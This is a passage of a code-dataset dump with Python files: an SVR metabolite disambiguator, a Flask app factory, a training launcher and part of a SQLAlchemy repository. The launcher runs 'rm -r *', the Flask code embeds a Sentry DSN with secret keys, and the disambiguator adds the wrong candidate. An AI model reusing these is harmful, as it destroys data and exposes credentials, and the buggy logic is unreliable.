"app.models.Product.supplier_code", "line_number": 81, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 81, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_agg", "line_number": 82, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 82, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 83, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 83, "usage_type": "name"}, {"api_name": "app.models.Product.name", "line_number": 84, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 84, "usage_type": "name"}, {"api_name": "app.models.Product.summary", "line_number": 85, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 85, "usage_type": "name"}, {"api_name": "app.models.Product.website", "line_number": 86, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 86, "usage_type": "name"}, {"api_name": "app.models.Product.pricing", "line_number": 87, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 87, "usage_type": "name"}, {"api_name": "app.models.Product.supplier_code", "line_number": 91, "usage_type": "attribute"}, {"api_name": "app.models.Product", "line_number": 91, "usage_type": "name"}, {"api_name": "app.db.session.query", "line_number": 96, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 96, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 96, "usage_type": "name"}, {"api_name": "app.models.Address.supplier_code", "line_number": 99, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 99, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_agg", "line_number": 100, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlalchemy.func.json_build_object", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 101, "usage_type": "name"}, {"api_name": "app.models.Address.address_line", "line_number": 102, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 102, "usage_type": "name"}, {"api_name": "app.models.Address.suburb", "line_number": 103, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 103, "usage_type": "name"}, {"api_name": "app.models.Address.state", "line_number": 104, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 104, "usage_type": "name"}, {"api_name": "app.models.Address.postal_code", "line_number": 105, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 105, "usage_type": "name"}, {"api_name": "app.models.Address.supplier_code", "line_number": 109, "usage_type": "attribute"}, {"api_name": "app.models.Address", "line_number": 109, "usage_type": "name"}, {"api_name": "app.db.session.query", "line_number": 114, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 114, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 114, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 117, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 117, "usage_type": "name"}, {"api_name": "app.models.Supplier.name", "line_number": 118, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 118, "usage_type": "name"}, {"api_name": "app.models.Supplier.abn", "line_number": 119, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 119, "usage_type": "name"}, {"api_name": "app.models.Supplier.status", "line_number": 120, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 120, "usage_type": "name"}, {"api_name": "app.models.Supplier.creation_time.label", "line_number": 121, "usage_type": "call"}, {"api_name": "app.models.Supplier.creation_time", "line_number": 121, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 121, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 122, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 122, "usage_type": "name"}, {"api_name": "app.models.Supplier.website", "line_number": 123, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 123, "usage_type": "name"}, {"api_name": "app.models.Supplier.linkedin", "line_number": 124, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 124, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 125, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 125, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 126, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 126, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 127, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 127, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 128, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 128, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 129, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 129, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 130, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 130, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 131, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 131, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 132, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 132, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 133, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 133, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 134, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 134, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 135, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 135, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 136, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 136, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 137, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 137, "usage_type": "name"}, {"api_name": "app.models.Supplier.data", "line_number": 138, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 138, "usage_type": "name"}, {"api_name": "app.models.Supplier.id", "line_number": 143, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 143, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 144, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 144, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 145, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 145, "usage_type": "name"}, {"api_name": "app.models.Supplier.code", "line_number": 146, "usage_type": "attribute"}, {"api_name": "app.models.Supplier", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "5086573", "text": "import io\nimport json\nimport imp\nimport pprint\nimport warnings\nimport math\nfrom numpy import *\nfrom sklearn.svm import SVR\nimport pylab as pl\n\nimp.load_source('ols', '../ols.py')\nfrom ols import ols\n\nclass MetaboliteCandidate:\n keggID = 0\n props = {}\n\n def __init__(self, theKeggID, theProps):\n self.keggID = theKeggID\n self.props = theProps\n\nclass Disambiguator:\n model = None\n svr_rbf = None\n xMatrix = []\n yVector = []\n inUseCandidates = []\n ambiguities = {}\n keggIDToAmbiguityID = {}\n m = None\n maxScanIDPredictionError = 0.2\n mlrPropCombo = ['PUBCHEM_MOLECULAR_WEIGHT', 'PUBCHEM_EFFECTIVE_ROTOR_COUNT', 'PUBCHEM_MOLECULAR_WEIGHT', 'PUBCHEM_COVALENTLY_BONDED_UNIT_COUNT', 'PUBCHEM_MONOISOTOPIC_MASS', 'PUBCHEM_UNDEFINED_BOND_STEREOCENTER_COUNT', 'PUBCHEM_FORMAL_CHARGE']\n finalSampleSize = 0\n svr_C = 2 ** 10\n svr_gamma = 2 ** -11\n\n def __init__(self):\n\n ambiguitiesPropsFile = open('ambiguities.json', 'r')\n ambiguitiesPropsJSON = ambiguitiesPropsFile.read()\n rawAmbiguities = json.loads(ambiguitiesPropsJSON)\n\n for ambiguityID, ambiguityProps in rawAmbiguities.iteritems():\n scanID = ambiguityProps[\"scanid\"]\n metabolites = ambiguityProps[\"candidates\"]\n confident = ambiguityProps[\"confident\"]\n\n if ambiguityID not in self.ambiguities:\n self.ambiguities[ambiguityID] = {\n \"scanID\": scanID,\n \"candidates\": {},\n \"confident\": confident\n } \n\n for keggID, props in metabolites.iteritems():\n #this is super hackish, but it works\n #for each metabolite candidate, we set the ambiguity's scan id as a property on the metabolite candidate property list itself\n #that way, we can know the ambiguity's scan id without having to know the ambiguityid\n props[\"SUSPECTED_SCANTIME\"] = float(scanID)\n metabolite = MetaboliteCandidate(keggID, props)\n self.keggIDToAmbiguityID[keggID] = ambiguityID\n self.ambiguities[ambiguityID][\"candidates\"][keggID] = metabolite\n\n def disambiguate(self):\n self.svr_rbf = SVR(kernel='rbf', C=self.svr_C, gamma=self.svr_gamma)\n\n self.reset()\n #first build a model for masses with only a single candidate\n self.addAllConfidentCandidates()\n self.model = self.svr_rbf.fit(self.xMatrix, self.yVector)\n #next add the ambiguous ones\n self.addAllNonconfidentCandidates()\n yPred = self.model.predict(self.xMatrix)\n\n\n pl.scatter(self.yVector, yPred, c='red', label='raw')\n pl.hold('on')\n\n self.removeHighErrorCandidates()\n yPred = self.model.predict(self.xMatrix)\n #pl.scatter(self.yVector, yPred, c='green', label='filtered')\n\n pl.xlabel('recorded')\n pl.ylabel('predicted')\n pl.title('Support Vector Regression')\n pl.legend()\n pl.show()\n\n return len(self.inUseCandidates)\n\n def tryMLR(self):\n try:\n self.m = ols(array(self.yVector), array(self.xMatrix)) #, y_varnm = 'y', x_varnm = ['x1','x2','x3','x4','x5','x6','x7'])\n #self.m.summary()\n return True\n except:\n #print(\"error\")\n return False\n\n def addAllConfidentCandidates(self):\n for ambiguityID, ambiguityProps in self.ambiguities.iteritems():\n candidates = ambiguityProps[\"candidates\"]\n isConfident = int(ambiguityProps[\"confident\"])\n if isConfident == 1:\n candidate = candidates.itervalues().next()\n self.tryToAddMetabolite(candidate)\n\n def addAllNonconfidentCandidates(self):\n for ambiguityID, ambiguityProps in self.ambiguities.iteritems():\n candidates = ambiguityProps[\"candidates\"]\n isConfident = int(ambiguityProps[\"confident\"])\n if isConfident == 0:\n #choose the candidate whose elution time is closest to the predicted time\n closestCandidate = None\n smallestError = inf\n\n for candidate in candidates.itervalues():\n\n validCandidate = True\n props = candidate.props\n scanID = props[\"SUSPECTED_SCANTIME\"]\n lookedUpPropArr = []\n for prop in self.mlrPropCombo:\n if prop in props:\n val = props[prop]\n lookedUpPropArr.append(val)\n else:\n validCandidate = False\n break\n\n if validCandidate:\n predScanID = self.model.predict([lookedUpPropArr])\n rawError = fabs(predScanID - scanID)\n\n if closestCandidate == None or rawError < smallestError:\n closestCandidate = candidate\n smallestError = rawError\n \n if closestCandidate != None:\n self.tryToAddMetabolite(candidate)\n\n def removeHighErrorCandidates(self):\n quantity = len(self.inUseCandidates)\n i = 0\n while i < quantity:\n candidate = self.inUseCandidates[i]\n validCandidate = True\n props = candidate.props\n scanID = props[\"SUSPECTED_SCANTIME\"]\n lookedUpPropArr = []\n for prop in self.mlrPropCombo:\n if prop in props:\n val = props[prop]\n lookedUpPropArr.append(val)\n else:\n validCandidate = False\n del self.inUseCandidates[i]\n del self.yVector[i]\n del self.xMatrix[i]\n quantity -= 1\n i -= 1\n break\n\n if validCandidate:\n predScanID = self.model.predict([lookedUpPropArr])\n \n errorPct = fabs(predScanID - scanID) / float(scanID)\n if errorPct > self.maxScanIDPredictionError:\n del self.inUseCandidates[i]\n del self.yVector[i]\n del self.xMatrix[i]\n quantity -= 1\n i -= 1\n\n i += 1\n\n def tryToAddMetabolite(self, metabolite):\n #returns true if added, false if one or more properties were not found\n\n if not isinstance(metabolite, MetaboliteCandidate):\n return False\n\n knownProps = metabolite.props\n scanTime = knownProps['SUSPECTED_SCANTIME']\n xMatrixRow = []\n for prop in self.mlrPropCombo:\n if prop in knownProps:\n val = knownProps[prop]\n xMatrixRow.append(val)\n else:\n return False\n #all properties extant and added to matrix row\n self.inUseCandidates.append(metabolite)\n self.xMatrix.append(xMatrixRow)\n self.yVector.append(scanTime)\n return True\n\n\n def reset(self):\n self.inUseCandidates = []\n self.xMatrix = []\n self.yVector = []\n\n def printSummary(self):\n self.tryMLR()\n\n b = self.m.b\n summary = {}\n\n print(\"\")\n print(\"summary of all ambiguous metabolites:\")\n for ambiguityID, ambiguityProps in self.ambiguities.iteritems():\n candidates = ambiguityProps[\"candidates\"]\n\n for keggID, candidate in candidates.iteritems():\n addToSummary = True\n knownProps = candidate.props\n scanTime = knownProps['SUSPECTED_SCANTIME']\n lookedUpPropArr = []\n for prop in self.mlrPropCombo:\n if prop in knownProps:\n val = knownProps[prop]\n lookedUpPropArr.append(val)\n else:\n addToSummary = False\n break\n if addToSummary:\n yPred = b[0]\n for propIndex in range(0, len(lookedUpPropArr)):\n propVal = lookedUpPropArr[propIndex]\n propCoefficient = b[propIndex + 1]\n yPred += propCoefficient * propVal\n\n metaboliteSummary = {\n \"keggid\": keggID,\n \"scan\": scanTime,\n \"prediction\": yPred,\n \"error\": (math.fabs(scanTime - yPred) / scanTime)\n }\n if candidate in self.inUseCandidates:\n metaboliteSummary[\"chosen\"] = True\n\n summaryKey = \"ambiguity\" + str(ambiguityID)\n if summaryKey not in summary:\n summary[summaryKey] = []\n\n summary[summaryKey].append(metaboliteSummary)\n\n\n pp = pprint.PrettyPrinter()\n pp.pprint(summary)\n\n#sometimes scipy generates warnings, which usually means something went wrong and we might get bad data\n#to remedy this, switch all warnings to error, catch them when doing the multiple linear regression, and disregard that result\n#warnings.resetwarnings()\n#warnings.simplefilter('error')\n\nif __name__ == '__main__':\n disambiguator = Disambiguator()\n sampleSize = disambiguator.disambiguate()\n#disambiguator.printSummary()\n", "sub_path": "build_model/disambiguate_svr/disambiguate.py", "file_name": "disambiguate.py", "file_ext": "py", "file_size_in_byte": 9501, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "imp.load_source", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", "line_number": 65, "usage_type": "call"}, {"api_name": "pylab.scatter", "line_number": 76, "usage_type": "call"}, {"api_name": "pylab.hold", "line_number": 77, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 83, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 85, "usage_type": "call"}, {"api_name": "pylab.legend", "line_number": 86, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 87, "usage_type": "call"}, {"api_name": "ols.ols", "line_number": 93, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 238, "usage_type": "call"}, {"api_name": "pprint.PrettyPrinter", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "445873245", "text": "\n\"\"\"\n\nFlask app factory. Create the app and attach all libraries with create_app.\nAlso takes care of registering all routes, including API views.\n\nHandles a couple of different config scenarios, including Docker, CircleCI and testing.\n\n\"\"\"\n\nimport httplib\nimport wtforms_json\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask_admin import Admin, BaseView, AdminIndexView, expose\nfrom flask_admin.contrib.fileadmin import FileAdmin\nfrom flask_admin.contrib.sqla import ModelView\nfrom raven.contrib.flask import Sentry\n\nfrom sampleserve.core import db\nfrom sampleserve.v1 import (\n api,\n auth,\n labs,\n bplabs,\n roles,\n samples,\n uploads,\n substancegroups,\n substances,\n criterias,\n states,\n sites,\n sitedata,\n clients,\n schedules,\n schedulewelltests,\n contacts,\n users,\n get_user,\n get_lab,\n consultants,\n companies,\n managers,\n samplers,\n offices,\n wells,\n wellimages,\n frequencies,\n reports,\n imports,\n tests,\n testmaterials,\n sitemaps,\n sitemapwells,\n)\n\nfrom sampleserve.users.auth import (\n auth_manager,\n bcrypt,\n)\n\nfrom sampleserve.rest.errors import (\n UnprocessableEntity,\n handle_unprocessable_entity,\n BadRequest,\n handle_bad_request,\n handle_unauthorized,\n handle_page_not_found,\n handle_method_not_allowed,\n BadUpload,\n handle_bad_upload,\n BadInvite,\n handle_bad_invite,\n FormError,\n handle_form_error,\n)\nfrom sampleserve import mail\nfrom sampleserve.emails.helpers import firstname\n\nfrom sampleserve.admin.views import AdminModel, MyHomeView, UserView, SiteView\n\n\ndef register_api(app, view, url, pk='id', pk_type='int', **kwargs):\n app.add_url_rule(url, defaults={pk: None}, view_func=view, methods=['GET'], **kwargs)\n app.add_url_rule(url, view_func=view, methods=['POST'], **kwargs)\n app.add_url_rule('%s<%s:%s>' % (url, pk_type, pk), view_func=view, methods=['GET', 'PATCH', 'DELETE'], **kwargs)\n\n\ndef create_app():\n app = Flask(__name__)\n\n app.config.from_object('sampleserve.config.settings')\n\n # Turn off strict slashes\n app.url_map.strict_slashes = False\n\n # Initialize Flask_Mail\n mail.init_app(app)\n\n app.register_blueprint(api, url_prefix='/api/v1', subdomain='')\n app.register_blueprint(auth, url_prefix='/api/v1/auth', subdomain='')\n app.register_blueprint(reports, url_prefix='/api/v1/reports', subdomain='')\n app.register_blueprint(imports, url_prefix='/api/v1/imports', subdomain='')\n app.register_blueprint(bplabs, url_prefix='/api/v1/labs')\n\n register_api(app, labs, '/api/v1/labs/', subdomain='')\n register_api(app, roles, '/api/v1/roles/', subdomain='')\n register_api(app, samples, '/api/v1/samples/', subdomain='')\n register_api(app, substances, '/api/v1/substances/', subdomain='')\n register_api(app, substancegroups, '/api/v1/substancegroups/', subdomain='')\n register_api(app, substances, '/api/v1/substances/', subdomain='')\n register_api(app, criterias, '/api/v1/criterias/', subdomain='')\n register_api(app, states, '/api/v1/states/', subdomain='')\n register_api(app, sites, '/api/v1/sites/', subdomain='')\n register_api(app, sitedata, '/api/v1/sitedata/', subdomain='')\n register_api(app, clients, '/api/v1/clients/', subdomain='')\n register_api(app, uploads, '/api/v1/uploads/', subdomain='')\n register_api(app, schedules, '/api/v1/schedules/', subdomain='')\n register_api(app, schedulewelltests, '/api/v1/schedulewelltests/', subdomain='')\n register_api(app, contacts, '/api/v1/contacts/', subdomain='')\n register_api(app, users, '/api/v1/users/', subdomain='')\n register_api(app, consultants, '/api/v1/consultants/', subdomain='')\n register_api(app, companies, '/api/v1/companies/', subdomain='')\n register_api(app, managers, '/api/v1/managers/', subdomain='')\n register_api(app, samplers, '/api/v1/samplers/', subdomain='')\n register_api(app, offices, '/api/v1/offices/', subdomain='')\n register_api(app, wells, '/api/v1/wells/', subdomain='')\n register_api(app, wellimages, '/api/v1/wellimages/', subdomain='')\n register_api(app, frequencies, '/api/v1/frequencies/', subdomain='')\n register_api(app, tests, '/api/v1/tests/', subdomain='')\n register_api(app, testmaterials, '/api/v1/testmaterials/', subdomain='')\n register_api(app, sitemaps, '/api/v1/sitemaps/', subdomain='')\n register_api(app, sitemapwells, '/api/v1/sitemapwells/', subdomain='')\n\n app.add_url_rule('/api/v1/user', 'user', get_user, subdomain='')\n app.add_url_rule('/api/v1/lab', 'lab', get_lab, subdomain='')\n\n app.register_error_handler(UnprocessableEntity, handle_unprocessable_entity)\n app.register_error_handler(BadUpload, handle_bad_upload)\n app.register_error_handler(BadInvite, handle_bad_invite)\n app.register_error_handler(BadRequest, handle_bad_request)\n app.register_error_handler(httplib.NOT_FOUND, handle_page_not_found)\n app.register_error_handler(httplib.METHOD_NOT_ALLOWED, handle_method_not_allowed)\n app.register_error_handler(httplib.UNAUTHORIZED, handle_unauthorized)\n app.register_error_handler(FormError, handle_form_error)\n\n # register some custom app filters\n app.jinja_env.filters['firstname'] = firstname\n\n db.init_app(app)\n bcrypt.init_app(app)\n auth_manager.init_app(app)\n\n if app.config.get('DEBUG'):\n CORS(app, origins=app.config.get('CORS_SERVER_NAME'), supports_credentials=True)\n\n # Activate wtforms json helpers\n wtforms_json.init()\n\n # Activate sentry\n if not app.config.get('DEBUG'):\n sentry = Sentry(app, dsn='http://ded2865b70164ed58a18a82f3bc1d589:be268c2f50bd425f98acbe2e3f712317@sentry.nickwoodhams.com/19')\n\n return app\n", "sub_path": "sampleserve/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6012, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 92, "usage_type": "call"}, {"api_name": "sampleserve.mail.init_app", "line_number": 100, "usage_type": "call"}, {"api_name": "sampleserve.mail", "line_number": 100, "usage_type": "name"}, {"api_name": "sampleserve.v1.api", "line_number": 102, "usage_type": "argument"}, {"api_name": "sampleserve.v1.auth", "line_number": 103, "usage_type": "argument"}, {"api_name": "sampleserve.v1.reports", "line_number": 104, "usage_type": "argument"}, {"api_name": "sampleserve.v1.imports", "line_number": 105, "usage_type": "argument"}, {"api_name": "sampleserve.v1.bplabs", "line_number": 106, "usage_type": "argument"}, {"api_name": "sampleserve.v1.labs", "line_number": 108, "usage_type": "argument"}, {"api_name": "sampleserve.v1.roles", "line_number": 109, "usage_type": "argument"}, {"api_name": "sampleserve.v1.samples", "line_number": 110, "usage_type": "argument"}, {"api_name": "sampleserve.v1.substances", "line_number": 111, "usage_type": "argument"}, {"api_name": "sampleserve.v1.substancegroups", "line_number": 112, "usage_type": "argument"}, {"api_name": "sampleserve.v1.substances", "line_number": 113, "usage_type": "argument"}, {"api_name": "sampleserve.v1.criterias", "line_number": 114, "usage_type": "argument"}, {"api_name": "sampleserve.v1.states", "line_number": 115, "usage_type": "argument"}, {"api_name": "sampleserve.v1.sites", "line_number": 116, "usage_type": "argument"}, {"api_name": "sampleserve.v1.sitedata", "line_number": 117, "usage_type": "argument"}, {"api_name": "sampleserve.v1.clients", "line_number": 118, "usage_type": "argument"}, {"api_name": "sampleserve.v1.uploads", "line_number": 119, "usage_type": "argument"}, {"api_name": "sampleserve.v1.schedules", "line_number": 120, "usage_type": "argument"}, {"api_name": "sampleserve.v1.schedulewelltests", "line_number": 121, "usage_type": "argument"}, {"api_name": "sampleserve.v1.contacts", "line_number": 122, "usage_type": "argument"}, {"api_name": "sampleserve.v1.users", "line_number": 123, "usage_type": "argument"}, {"api_name": "sampleserve.v1.consultants", "line_number": 124, "usage_type": "argument"}, {"api_name": "sampleserve.v1.companies", "line_number": 125, "usage_type": "argument"}, {"api_name": "sampleserve.v1.managers", "line_number": 126, "usage_type": "argument"}, {"api_name": "sampleserve.v1.samplers", "line_number": 127, "usage_type": "argument"}, {"api_name": "sampleserve.v1.offices", "line_number": 128, "usage_type": "argument"}, {"api_name": "sampleserve.v1.wells", "line_number": 129, "usage_type": "argument"}, {"api_name": "sampleserve.v1.wellimages", "line_number": 130, "usage_type": "argument"}, {"api_name": "sampleserve.v1.frequencies", "line_number": 131, "usage_type": "argument"}, {"api_name": "sampleserve.v1.tests", "line_number": 132, "usage_type": "argument"}, {"api_name": "sampleserve.v1.testmaterials", "line_number": 133, "usage_type": "argument"}, {"api_name": "sampleserve.v1.sitemaps", "line_number": 134, "usage_type": "argument"}, {"api_name": "sampleserve.v1.sitemapwells", "line_number": 135, "usage_type": "argument"}, {"api_name": "sampleserve.v1.get_user", "line_number": 137, "usage_type": "argument"}, {"api_name": "sampleserve.v1.get_lab", "line_number": 138, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.UnprocessableEntity", "line_number": 140, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_unprocessable_entity", "line_number": 140, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.BadUpload", "line_number": 141, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_bad_upload", "line_number": 141, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.BadInvite", "line_number": 142, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_bad_invite", "line_number": 142, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.BadRequest", "line_number": 143, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_bad_request", "line_number": 143, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_page_not_found", "line_number": 144, "usage_type": "argument"}, {"api_name": "httplib.NOT_FOUND", "line_number": 144, "usage_type": "attribute"}, {"api_name": "sampleserve.rest.errors.handle_method_not_allowed", "line_number": 145, "usage_type": "argument"}, {"api_name": "httplib.METHOD_NOT_ALLOWED", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sampleserve.rest.errors.handle_unauthorized", "line_number": 146, "usage_type": "argument"}, {"api_name": "httplib.UNAUTHORIZED", "line_number": 146, "usage_type": "attribute"}, {"api_name": "sampleserve.rest.errors.FormError", "line_number": 147, "usage_type": "argument"}, {"api_name": "sampleserve.rest.errors.handle_form_error", "line_number": 147, "usage_type": "argument"}, {"api_name": "sampleserve.emails.helpers.firstname", "line_number": 150, "usage_type": "name"}, {"api_name": "sampleserve.core.db.init_app", "line_number": 152, "usage_type": "call"}, {"api_name": "sampleserve.core.db", "line_number": 152, "usage_type": "name"}, {"api_name": "sampleserve.users.auth.bcrypt.init_app", "line_number": 153, "usage_type": "call"}, {"api_name": "sampleserve.users.auth.bcrypt", "line_number": 153, "usage_type": "name"}, {"api_name": "sampleserve.users.auth.auth_manager.init_app", "line_number": 154, "usage_type": "call"}, {"api_name": "sampleserve.users.auth.auth_manager", "line_number": 154, "usage_type": "name"}, {"api_name": "flask_cors.CORS", "line_number": 157, "usage_type": "call"}, {"api_name": "wtforms_json.init", "line_number": 160, "usage_type": "call"}, {"api_name": "raven.contrib.flask.Sentry", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "175641258", "text": "import os\nimport time\nimport multiprocessing\nimport moxing as mox\nimport numpy as np\n\n\ndataset = 'cifar10'\nmox.file.copy_parallel('s3://bucket-london2/DATASETS/' + dataset.upper(),'/cache/test')\nos.system('rm -r *')\n\nbase_name = '4444_final_cifar10_v1'\n\ndef single_run(seed, gpu):\n n_layers1 = 14\n n_layers2 = 20\n n_epochs1 = 76\n\n name = base_name + '_v' + str(gpu)\n\n os.system('python /cache/code/search.py --name {} --dataset {} --layers {} --epochs {} --seed {} --gpus {} --drop_rate 0.00003'\n .format(name, dataset, n_layers1, n_epochs1, seed, gpu))\n\n with open(os.path.join('searchs', name,'genotype.txt'), 'r') as f:\n genotype = f.read()\n\n os.system('python /cache/code/augment.py --name {} --dataset {} --seed {} --gpus {} --genotype \"{}\"'.\n format(name, dataset, seed, gpu, genotype))\n\n\nif __name__ == '__main__':\n \n processes = []\n for i in range(8):\n p = multiprocessing.Process(target=single_run, args=(i, i))\n processes.append(p)\n p.start()\n \n for p in processes:\n p.join()\n \n accs = []\n res_file = 'result_' + base_name + '.txt'\n with open(res_file, 'w') as res:\n for i in range(8):\n name = base_name + '_v' + str(i)\n with open(os.path.join('searchs', name, 'genotype.txt'), 'r') as f:\n genotype = f.read()\n with open(os.path.join('augments', name, name + '.log')) as f:\n lines = f.readlines()\n acc = lines[-1][-9:-3]\n accs.append(float(acc))\n \n res.write('{}\\t{}\\n'.format(acc, genotype))\n \n mean = np.mean(accs)\n std = np.std(accs)\n res.write('mean: {:.2f}\\tstd: {:.2f}\\n'.format(mean, std))\n \n mox.file.copy_parallel(res_file, os.path.join('s3://bucket-auto2/hongweijun/archive2/', res_file))\n\n\n", "sub_path": "start.py", "file_name": "start.py", "file_ext": "py", "file_size_in_byte": 1864, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "moxing.file.copy_parallel", "line_number": 9, "usage_type": "call"}, {"api_name": "moxing.file", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 10, "usage_type": "call"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 27, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 57, "usage_type": "call"}, {"api_name": "moxing.file.copy_parallel", "line_number": 60, "usage_type": "call"}, {"api_name": "moxing.file", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "24488840", "text": "import logging\n\nfrom sqlalchemy import exc\nfrom sqlalchemy.orm import exc as orm_exc\n\nfrom flask_jsonapi import exceptions\nfrom flask_jsonapi.resource_repositories import repositories\nfrom flask_jsonapi.exceptions import ForbiddenError\n\nlogger = logging.getLogger(__name__)\n\n\nclass SqlAlchemyModelRepository(repositories.ResourceRepository):\n model = None\n session = None\n instance_name = 'model instance'\n filter_methods_map = {}\n\n def create(self, data, **kwargs):\n obj = self.build(data)\n self.session.add(obj)\n try:\n self.session.flush()\n return obj\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='{} could not be created.'.format(self.instance_name.capitalize()))\n\n def get_list(self, filters=None):\n try:\n query = self.get_query()\n return self.apply_filters(query, filters).all()\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while getting {} list.'.format(self.instance_name))\n\n def get_detail(self, id):\n try:\n return self.get_query().filter(self.model.id == id).one()\n except orm_exc.NoResultFound:\n raise exceptions.ObjectNotFound(source={'parameter': 'id'},\n detail='{} {} not 